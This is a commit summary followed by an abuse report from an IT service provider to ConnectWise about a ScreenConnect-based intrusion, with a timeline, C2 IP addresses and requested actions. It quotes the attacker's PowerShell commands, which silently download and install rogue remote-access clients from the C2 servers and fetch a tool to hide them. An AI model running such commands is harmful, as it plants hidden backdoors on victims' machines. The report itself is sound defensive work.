d7d9f72fc6
- DF-JOEL2 compromised via ScreenConnect social engineering (Angel Raya) - C2 IPs blocked, rogue clients removed, M365 sessions revoked, password reset - IC3 complaint filed, abuse reports sent to Virtuo and ConnectWise - Conditional Access policies deployed (MFA, block foreign, block legacy auth) - 38 stale test station accounts deleted from Entra - Test datasheet pipeline investigated - data exists in DB, export step broken - TestDataSheetUploader source code extracted for analysis Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
3.6 KiB
Subject: Abuse Report - ScreenConnect Cloud Instance Used for Unauthorized Access and C2 Deployment
Dear ConnectWise Security/Abuse Team,
We are reporting a ScreenConnect cloud instance being used to conduct unauthorized access attacks against our client's infrastructure.
Offending ScreenConnect Instance
- Relay hostname: instance-wlb9ga-relay.screenconnect.com
- Operator alias: Angel Raya
- ScreenConnect Client ID: 0cad93610010625f
- Session GUID: 8bb6c85a-6cab-46ab-8cad-26f6d2672a03
- Client Version: 26.1.18.9566
Nature of Abuse
On March 27, 2026, an individual operating under the name "Angel Raya" used the above ScreenConnect cloud instance to gain unauthorized remote access to a victim workstation. Once connected, the operator used the ScreenConnect backstage shell to execute PowerShell commands that:
- Downloaded and silently installed two additional ScreenConnect clients from self-hosted C2 servers (80.76.49.18:8040 and 45.88.91.99:8040, both on AS399486 / Virtuo hosting)
- Downloaded a tool to hide the rogue installations from the Windows uninstall list
- Returned later through the self-hosted C2 backdoor under the session name "Administrator"
Attack Timeline (March 27, 2026)
- 08:28 - ScreenConnect client (0cad93610010625f) installed from
C:\Users\jlohr\Downloads\ScreenConnect.ClientSetup.msi - 08:29 - "Angel Raya" connected via instance-wlb9ga-relay.screenconnect.com
- 08:29 - PowerShell commands executed to install two self-hosted ScreenConnect C2 backdoors
- 08:31 - "Hide From Uninstall List" tool downloaded and extracted
- 08:32 - Tool used to hide rogue ScreenConnect clients from Add/Remove Programs
- 08:32 - "Angel Raya" disconnected
Commands Executed via Backstage Shell
The following commands were found in the PowerShell terminal history on the victim machine:
powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
Invoke-WebRequest -Uri "https://www.sordum.org/files/downloads.php?hide-from-uninstall-list" -OutFile "C:\Users\Public\Pictures\Backup.zip"
Additional Context
- The victim's Microsoft 365 account also showed successful unauthorized sign-ins from Istanbul, Turkey and Croydon, UK, along with sustained brute-force attempts from Germany and Luxembourg over the preceding week.
- The self-hosted C2 ScreenConnect MSI packages have build dates of April 8, 2025, suggesting this operation has been active for approximately one year.
- The victim was a departing employee (retiring March 31, 2026), which may have been a factor in targeting.
Requested Action
- Identify and suspend the ScreenConnect cloud account associated with instance-wlb9ga-relay.screenconnect.com
- Preserve all session logs, account registration information, and billing details for this instance
- Share any available information with law enforcement upon request
This incident is being reported to the FBI IC3 and the hosting provider (Virtuo / AS399486).
Reporting Organization
Arizona Computer Guru, LLC Managed Service Provider Phone: 520-304-8300 Email: support@azcomputerguru.com
Thank you for your prompt response.